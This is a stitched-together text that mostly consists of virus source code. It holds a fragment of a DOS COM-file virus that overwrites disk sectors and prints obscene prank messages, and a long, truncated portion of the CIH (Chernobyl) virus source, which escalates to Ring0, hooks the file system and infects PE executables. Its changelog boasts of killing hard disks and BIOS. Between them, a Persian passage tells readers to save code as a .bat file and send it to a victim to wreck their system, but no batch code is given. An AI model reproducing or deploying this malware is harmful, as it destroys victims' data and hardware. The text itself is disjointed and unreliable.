and carry flag adc ah,0 ;Add carry to AH or ax,ax ;AX = 0 ??? jnz Kill ;Kill the disk now... inc ax ;Well, adjust first... Kill: mov dx,ax ;Sector number mov cx,1 ;One at a time.... xor bx,bx ;Point at PSP mov ah,19h ;Get current disk int 21h ;Call DOS to ^ int 26h ;Now kill the disk GiveUp: mov bx,offset message_table ;point to table mov ah,2ch ;Get time int 21h ;Call DOS to ^ inc dh ;(0-59) timeloop: cmp dh,msgs ;mapped yet? jl timedone ;Yes, jump sub dh,msgs ;try to map it jmp short timeloop ;and check out work timedone: mov al,dh ;AL gets msg # mov cl,al ;Save in CL for CritErr cbw ;AH gets 0 shl ax,1 ;AX = AX * 2 add bx,ax ;BX = index mov si,[bx] ;SI points to string mov ch,[si-1] ;CH is technique # mov dx,si ;DX points to string mov ah,9 ;Display string int 21h ;Call DOS to ^ cmp ch,terminate ;Terminate program? je TerminateProg ;Nope, next test cmp ch,halt ;Halt program? je $ ;Hang system if ch=halt cmp ch,SimulateCritErr ;Simulate CritErr? je simulate ;yes, go do it cmp ch,Return2host ;Return to host? je ResumeProgram ;yes, go do it cmp ch,FlashFloppy ;Flash drive A:? je FlashFlop ;Yes, go do it cmp ch,WaitKey ;Wait for keypress? je zwait ;Yes, go do it cmp ch,PauseKey ;Pause message w/ wait? je zpause ;Yes, go do it cmp ch,StackError ;Stack overflow? je StackErr ;Yes, go do it ;Invalid code, assume Return2host ResumeProgram: jmp return ;Return to caller StackErr: call $ ;Cause stack overflow TerminateProg: int 20h ;Yep, all done! simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ... mov ah,9 ;Print string int 21h ;Call DOS to ^ mov ah,1 ;Input a char int 21h ;Call DOS to ^ lea dx,[bp+offset crlf] ;crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ cmp al,'a' ;Uppercase? jb uppercase ;Nope, jump sub al,' ' ;Yes, make uppercase uppercase: cmp al,'A' ;Abort? je terminateprog ;Yep, go do it. cmp al,'R' ;Retry? jne zskip ;skip over "retry" code lea dx,[bp+offset crlf] ;Point to crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ mov dh,cl ;Restore DH from CL jmp timedone ;Reprint error zskip: cmp al,'I' ;Ignore? je ResumeProgram ;Return to host program cmp al,'F' ;Fail? jne simulate ;Invalid response lea dx,[bp+offset fail24] ;Point to fail string mov ah,9 ;Print string int 21h ;Call DOS to ^ int 20h ;Terminate program FlashFlop: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ xor ax,ax ;Drive A: mov cx,1 ;Read 1 sector mov dx,ax ;Start at boot sector lea bx,[bp+offset boot_sector] ;BX points to buffer int 25h ;Flash light on A: jmp short ResumeProgram ;Resume if no error zpause: lea dx,[bp+offset pause] ;Point to pause message mov ah,9 ;Print string int 21h ;Call DOS to ^ zwait: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ jmp short ResumeProgram ;Go on... ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$' fail24 db cr,lf,cr,lf,'Fail on INT 24' crlf db cr,lf,'$' message_table: dw offset msg1 dw offset msg2 dw offset msg3 dw offset msg4 dw offset msg5 dw offset msg6 dw offset msg7 dw offset msg8 dw offset msg9 dw offset msg10 dw offset msg11 dw offset msg12 dw offset msg13 dw offset msg14 dw offset msg15 dw offset msg16 dw offset msg17 dw offset msg18 dw offset msg19 dw offset msg20 msgs db 20 ; I tried to make it as simple as possible to change the messages ; and add/delete them. Each message is in the format: ; ; db [technique] ;[label] db [Text] ; ; Where [technique] is one of the 8 codes shown at the beginning of ; this file (terminate, halt, etc.). This determines what the virus ; should do after printing the message. ; [label] is in the form "msg##" where ## is a number from 1 to ; "msgs". "msgs" is defined immediately before this ; comment block. ; [text] is a combination of text and ASCII codes, terminated by ; either a '$' or a ,36. ; ; If you change the number of messages the virus has, you should also ; add/remove lines from the offset table and change the "msgs" ; data byte appropriately. Let's say for instance that you want ; to remove "Program too big to fit in memory.": ; 1) Delete the line(s) with the message and the line ; immediately before it. ; 2) Move message #20 up to message #2's position and ; change its label from "msg20" to "msg2". ; 3) Delete the line "dw offset msg20" from the offset ; table. ; 4) Change the line before this comment block to: ; "msgs db 19" ; ; Later! ; -The BOOT SECTOR Infector ... ; db FlashFloppy ;Waits for key, then flashes drive A: msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf pause db 'Strike any key when ready... $' db SimulateCritErr ;Prints ARIF message and responds appropriately msg1 db 'Impotence error reading user',39,'s dick$' db terminate ;Ends the program immediately msg2 db 'Program too big to fit in memory',cr,lf,'$' db halt ;Halts the system msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$' db terminate ;Ends the program immediately msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid' db ' I can',39,'t do that!',cr,lf,'$' db WaitKey ;Waits for a keypress, then runs the program msg6 db 'Format another? (Y/N)? $' db StackError ;Generates a stack overflow (halts the system) msg7 db 'Damn it! I told you not to touch that!$' db terminate ;Ends the program immediately msg8 db 'Suck me!',cr,lf,'$' db SimulateCritErr ;Prints ARIF message and responds appropriately msg9 db 'Cocksucker At Keyboard error reading device CON:$' db terminate ;Ends the program immediately msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf db 'I',39,'m sorry, but your call cannot be completed as dialed.' db cr,lf,'Please hang up & try your call again.',cr,lf,'$' db terminate ;Ends the program immediately msg11 db 'No!',cr,lf,cr,lf,'$' db halt ;Halts the system msg12 db 'Panic kernal mode interrupt$' db WaitKey ;Waits for a keypress, then runs the program msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$' db return2host ;Runs host program immediately msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$' db terminate ;Ends the program immediately msg15 db 'And if I refuse?',cr,lf,'$' db return2host ;Runs host program immediately msg16 db 'Fuck the world and its followers!',cr,lf,'$' db return2host ;Runs host program immediately msg17 db 'You are pathetic, man... you know that?',cr,lf,'$' db terminate ;Ends the program immediately msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$' db terminate ;Ends the program immediately msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$' db PauseKey ;Waits for keypress (SAKWR), then runs host prg msg20 db 'Joker! ver àà by TBSI!',cr,lf db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$' int24handler: xor al,al ;Ignore the error iret ;Interrupt return filespec: db '*.COM',0 ;File specification prevdir: db '..',0 ;previous directory max2kill db 3 ;max. files to infect eoec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤEnd Of Encrypted Code VersionNumber dw 100h ;Version 1.00 encrypt_val db 0 ;1st-run copy only ; None of this information is included in the virus's code. It is only used ; during the search/infect routines and it is not necessary to preserve it ; in between calls to them. eof: DTA: db 21 dup (?) ;internal search's data attribute db ? ;attribute file_time db 2 dup (?) ;file's time stamp file_date db 2 dup (?) ;file's date stamp file_size db 4 dup (?) ;file's size filename db 13 dup (?) ;filename SavedAX dw ? ;Used to save AX infected db ? ;infection count addr dw ? ;Address boot_sector: main endp;rocedure code ends;egment end

و یروس خطرناک با نام Good Gory بساز ید!

برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Good Gory.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه موفق باشید نظر یادتون نره!

; **************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Source : TTIT of TATUNG in Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.4 * ; * Modification Time : 05/31/1998 * ; * * ; * Turbo Assembler Version 4.0 : tasm /m cih * ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ; * * ; *==========================================================================* ; * Modification History * ; *==========================================================================* ; * v1.0 1. Create the Virus Program. * ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * ; * 04/26/1998 3. Virus Code doesn't Reload into System. * ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * ; * 6. When System Opens Existing PE File, the File will be * ; * Infected, and the File doesn't be Reinfected. * ; * 7. It is also Infected, even the File is Read-Only. * ; * 8. When the File is Infected, the Modification Date and Time * ; * of the File also don't be Changed. * ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * ; * Previous FileSystemApiHook, it will Call the Function * ; * that the IFS Manager Would Normally Call to Implement * ; * this Particular I/O Request. * ; * 10. The Virus Size is only 656 Bytes. * ; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase * ; * it's Size... ^__^ * ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * ; * When Exception Error Occurs, Our OS System should be in * ; * Windows NT. So My Cute Virus will not Continue to Run, * ; * it will Jmup to Original Application to Run. * ; * 3. Use Better Algorithm, Reduce Virus Code Size. * ; * 4. The Virus "Basic" Size is only 796 Bytes. * ; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * ; * 2. Modify the Bug of v1.1 * ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * ; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * ; * So When Open WinZip Self-Extractor ==> Don't Infect it. * ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * ; *==========================================================================* ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * ; * 2. Change the Date of Killing Computers. * ; * 05/31/1998 3. Modify Virus Version Copyright. * ; * 4. The Virus "Basic" Size is 1019 Bytes. * ; **************************************************************************** .586P ; **************************************************************************** ; * Original PE Executable File(Don't Modify this Section) * ; **************************************************************************** OriginalAppEXE SEGMENT FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; **************************************************************************** ; * My Virus Game * ; **************************************************************************** ; ********************************************************* ; * Constant Define * ; ********************************************************* TRUE = 1 FALSE = 0 DEBUG = TRUE MajorVirusVersion = 1 MinorVirusVersion = 4 VirusVersion = MajorVirusVersion*10h+MinorVirusVersion IF DEBUG FirstKillHardDiskNumber = 81h HookExceptionNumber = 05h ELSE FirstKillHardDiskNumber = 80h HookExceptionNumber = 03h ENDIF FileNameBufferSize = 7fh ; ********************************************************* ; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; ********************************************************* ; * Ring3 Virus Game Initial Program * ; ********************************************************* MyVirusStart: push ebp ; ************************************* ; * Let's Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; ************************************* ; * Let's Modify * ; * IDT(Interrupt Descriptor Table) * ; * to Get Ring0 Privilege... * ; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 cli mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point lea esi, MyExceptionHook-@1[ecx] push esi mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address pop esi ; ************************************* ; * Generate Exception to Get Ring0 * ; ************************************* int HookExceptionNumber ; GenerateException ReturnAddressOfEndException = $ ; ************************************* ; * Merge All Virus Code Section * ; ************************************* push esi mov esi, eax LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 jmp LoopOfMergeAllVirusCodeSection QuitLoopOfMergeAllVirusCodeSection: pop esi ; ************************************* ; * Generate Exception Again * ; ************************************* int HookExceptionNumber ; GenerateException Again ; ************************************* ; * Let's Restore * ; * Structured Exception Handing * ; ************************************* ReadyRestoreSE: sti xor ebx, ebx jmp RestoreSE ; ************************************* ; * When Exception Error Occurs, * ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to * ; * Original Application to Run. * ; ************************************* StopToRunVirusCode: @1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; ************************************* ; * Return Original App to Execute * ; ************************************* pop ebp push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ret ; Return to Original App Entry Point ; ********************************************************* ; * Ring0 Virus Game Initial Program * ; ********************************************************* MyExceptionHook: @2 = MyExceptionHook jz InstallMyFileSystemApiHook ; ************************************* ; * Do My Virus Exist in System !? * ; ************************************* mov ecx, dr0 jecxz AllocateSystemMemoryPage add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; ************************************* ; * Return to Ring3 Initial Program * ; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; iretd ; ************************************* ; * Allocate SystemMemory Page to Use * ; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ; push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate _PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h xchg edi, eax ; EDI = SystemMemory Start Address lea eax, MyVirusStart-@2[esi] iretd ; Return to Ring3 Initial Program ; ************************************* ; * Install My File System Api Hook * ; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags mov dr0, eax ; Save OldFileSystemApiHook Address pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] mov OldInstallFileSystemApiHook-@3[eax], edx ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax cli jmp ExitRing0Init ; ********************************************************* ; * Code Size of Merge Virus Code Section * ; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; ********************************************************* ; * IFSMgr_InstallFileSystemApiHook * ; ********************************************************* InstallFileSystemApiHook: push ebx call @4 ; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook add ebx, FileSystemApiHook-@4 ; push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address pop eax pop ebx ret ; ********************************************************* ; * Static Data * ; ********************************************************* OldInstallFileSystemApiHook dd ? ; ********************************************************* ; * IFSMgr_FileSystemHook * ; ********************************************************* ; ************************************* ; * IFSMgr_FileSystemHook Entry Point * ; ************************************* FileSystemApiHook: @3 = FileSystemApiHook pushad call @5 ; @5: ; pop esi ; mov esi, offset VirusGameDataStartAddress add esi, VirusGameDataStartAddress-@5 ; ************************************* ; * Is OnBusy !? * ; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) jnz pIFSFunc ; goto pIFSFunc ; ************************************* ; * Is OpenFile !? * ; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] cmp dword ptr [ebx], 00000024h jne prevhook ; ************************************* ; * Enable OnBusy * ; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ; ************************************* ; * Get FilePath's DriveNumber, * ; * then Set the DriveName to * ; * FileNameBuffer. * ; ************************************* ; * Ex. If DriveNumber is 03h, * ; * DriveName is 'C:'. * ; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 push esi mov al, [ebx+04h] cmp al, 0ffh je CallUniToBCSPath add al, 40h mov ah, ':' mov [esi], eax inc esi inc esi ; ************************************* ; * UniToBCSPath * ; ************************************* ; * This Service Converts * ; * a Canonicalized Unicode Pathname * ; * to a Normal Pathname in the * ; * Specified BCS Character Set. * ; ************************************* CallUniToBCSPath: push 00000000h push FileNameBufferSize mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax push esi int 20h ; VXDCall UniToBCSPath UniToBCSPath = $ dd 00400041h add esp, 04h*04h ; ************************************* ; * Is FileName '.EXE' !? * ; ************************************* ; cmp [esi+eax-04h], '.EXE' cmp [esi+eax-04h], 'EXE.' pop esi jne DisableOnBusy IF DEBUG ; ************************************* ; * Only for Debug * ; ************************************* ; cmp [esi+eax-06h], 'FUCK' cmp [esi+eax-06h], 'KCUF' jne DisableOnBusy ENDIF ; ************************************* ; * Is Open Existing File !? * ; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h jne DisableOnBusy ; ************************************* ; * Get Attributes of the File * ; ************************************* mov ax, 4300h int 20h ; VXDCall IFSMgr_Ring0_FileIO IFSMgr_Ring0_FileIO = $ dd 00400032h jc DisableOnBusy push ecx ; ************************************* ; * Get IFSMgr_Ring0_FileIO Address * ; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ; ************************************* ; * Is Read-Only File !? * ; ************************************* test cl, 01h jz OpenFile ; ************************************* ; * Modify Read-Only File to Write * ; ************************************* mov ax, 4301h xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Open File * ; ************************************* OpenFile: xor eax, eax mov ah, 0d5h xor ecx, ecx xor edx, edx inc edx mov ebx, edx inc ebx call edi ; VXDCall IFSMgr_Ring0_FileIO xchg ebx, eax ; mov ebx, FileHandle ; ************************************* ; * Need to Restore * ; * Attributes of the File !? * ; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ; ************************************* ; * Restore Attributes of the File * ; ************************************* mov ax, 4301h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Is Open File OK !? * ; ************************************* IsOpenFileOK: popf jc DisableOnBusy ; ************************************* ; * Open File Already Succeed. ^__^ * ; ************************************* push esi ; Push FileNameBuffer Address to Stack pushf ; Now CF = 0, Push Flag to Stack add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ; *************************** ; * Get OffsetToNewHeader * ; *************************** xor eax, eax mov ah, 0d6h ; For Doing Minimal VirusCode's Length, ; I Save EAX to EBP. mov ebp, eax push 00000004h pop ecx push 0000003ch pop edx call edi ; VXDCall IFSMgr_Ring0_FileIO mov edx, [esi] ; *************************** ; * Get 'PE\0' Signature * ; * of ImageFileHeader, and * ; * Infected Mark. * ; *************************** dec edx mov eax, ebp call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Is PE !? * ; *************************** ; * Is the File * ; * Already Infected !? * ; *************************** ; * WinZip Self-Extractor * ; * doesn't Have Infected * ; * Mark Because My Virus * ; * doesn't Infect it. * ; *************************** ; cmp [esi], '\0PE\0' cmp dword ptr [esi], 00455000h jne CloseFile ; ************************************* ; * The File is ^o^ * ; * PE(Portable Executable) indeed. * ; ************************************* ; * The File isn't also Infected. * ; ************************************* ; ************************************* ; * Start to Infect the File * ; ************************************* ; * Registers Use Status Now : * ; * * ; * EAX = 04h * ; * EBX = File Handle * ; * ECX = 04h * ; * EDX = 'PE\0\0' Signature of * ; * ImageFileHeader Pointer's * ; * Former Byte. * ; * ESI = DataBuffer Address ==> @8 * ; * EDI = IFSMgr_Ring0_FileIO Address * ; * EBP = D600h ==> Read Data in File * ; ************************************* ; * Stack Dump : * ; * * ; * ESP => ------------------------- * ; * | EFLAG(CF=0) | * ; * ------------------------- * ; * | FileNameBufferPointer | * ; * ------------------------- * ; * | EDI | * ; * ------------------------- * ; * | ESI | * ; * ------------------------- * ; * | EBP | * ; * ------------------------- * ; * | ESP | * ; * ------------------------- * ; * | EBX | * ; * ------------------------- * ; * | EDX | * ; * ------------------------- * ; * | ECX | * ; * ------------------------- * ; * | EAX | * ; * ------------------------- * ; * | Return Address | * ; * ------------------------- * ; ************************************* push ebx ; Save File Handle push 00h ; Set VirusCodeSectionTableEndMark ; *************************** ; * Let's Set the * ; * Virus' Infected Mark * ; *************************** push 01h ; Size push edx ; Pointer of File push edi ; Address of Buffer ; *************************** ; * Save ESP Register * ; *************************** mov dr1, esp ; *************************** ; * Let's Set the * ; * NewAddressOfEntryPoint * ; * ( Only First Set Size ) * ; *************************** push eax ; Size ; *************************** ; * Let's Read * ; * Image Header in File * ; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead add edx, 07h ; Move EDX to NumberOfSections call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Let's Set the * ; * NewAddressOfEntryPoint * ; * ( Set Pointer of File, * ; * Address of Buffer ) * ; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; *************************** ; * Move EDX to the Start * ; * of SectionTable in File * ; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ; *************************** ; * Let's Get * ; * Total Size of Sections * ; *************************** mov al, SizeOfScetionTable ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ; *************************** ; * Let's Set Section Table * ; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] push eax ; Size push edx ; Pointer of File push esi ; Address of Buffer ; *************************** ; * The Code Size of Merge * ; * Virus Code Section and * ; * Total Size of Virus * ; * Code Section Table Must * ; * be Small or Equal the * ; * Unused Space Size of * ; * Following Section Table * ; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h push ecx ; Save TotalSizeOfVirusCodeSectionTable add ecx, eax add ecx, edx sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table ; Save Original Address of Entry Point mov eax, (AddressOfEntryPoint-@9)[esi] add eax, (ImageBase-@9)[esi] mov (OriginalAddressOfEntryPoint-@9)[esi], eax cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection jl OnlySetInfectedMark ; *************************** ; * Read All Section Tables * ; *************************** mov eax, ebp call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Full Modify the Bug : * ; * WinZip Self-Extractor * ; * Occurs Error... * ; *************************** ; * So When User Opens * ; * WinZip Self-Extractor, * ; * Virus Doesn't Infect it.* ; *************************** ; * First, Virus Gets the * ; * PointerToRawData in the * ; * Second Section Table, * ; * Reads the Section Data, * ; * and Tests the String of * ; * 'WinZip(R)'...... * ; *************************** xchg eax, ebp push 00000004h pop ecx push edx mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi] add edx, 12h call edi ; VXDCall IFSMgr_Ring0_FileIO ; cmp [esi], 'nZip' cmp dword ptr [esi], 'piZn' je NotSetInfectedMark pop edx ; *************************** ; * Let's Set Total Virus * ; * Code Section Table * ; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx pop edi ; EDI = TotalSizeOfVirusCodeSectionTable pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, ebp push edx ; Pointer of File add ebp, esi push ebp ; Address of Buffer ; *************************** ; * Set the First Virus * ; * Code Section Size in * ; * VirusCodeSectionTable * ; *************************** lea eax, [ebp+edi-04h] mov [eax], ebx ; *************************** ; * Let's Set My Virus * ; * First Section Code * ; *************************** push ebx ; Size add edx, edi push edx ; Pointer of File lea edi, (MyVirusStart-@9)[esi] push edi ; Address of Buffer ; *************************** ; * Let's Modify the * ; * AddressOfEntryPoint to * ; * My Virus Entry Point * ; *************************** mov (NewAddressOfEntryPoint-@9)[esi], edx ; *************************** ; * Setup Initial Data * ; *************************** lea edx, [esi-SizeOfScetionTable] mov ebp, offset VirusSize jmp StartToWriteCodeToSections ; *************************** ; * Write Code to Sections * ; *************************** LoopOfWriteCodeToSections: add edx, SizeOfScetionTable mov ebx, (SizeOfRawData-@9)[edx] sub ebx, (VirtualSize-@9)[edx] jbe EndOfWriteCodeToSections push ebx ; Size sub eax, 08h mov [eax], ebx mov ebx, (PointerToRawData-@9)[edx] add ebx, (VirtualSize-@9)[edx] push ebx ; Pointer of File push edi ; Address of Buffer mov ebx, (VirtualSize-@9)[edx] add ebx, (VirtualAddress-@9)[edx] add ebx, (ImageBase-@9)[esi] mov [eax+4], ebx mov ebx, [eax] add (VirtualSize-@9)[edx], ebx ; Section contains initialized data ==> 00000040h ; Section can be Read. ==> 40000000h or (Characteristics-@9)[edx], 40000040h StartToWriteCodeToSections: 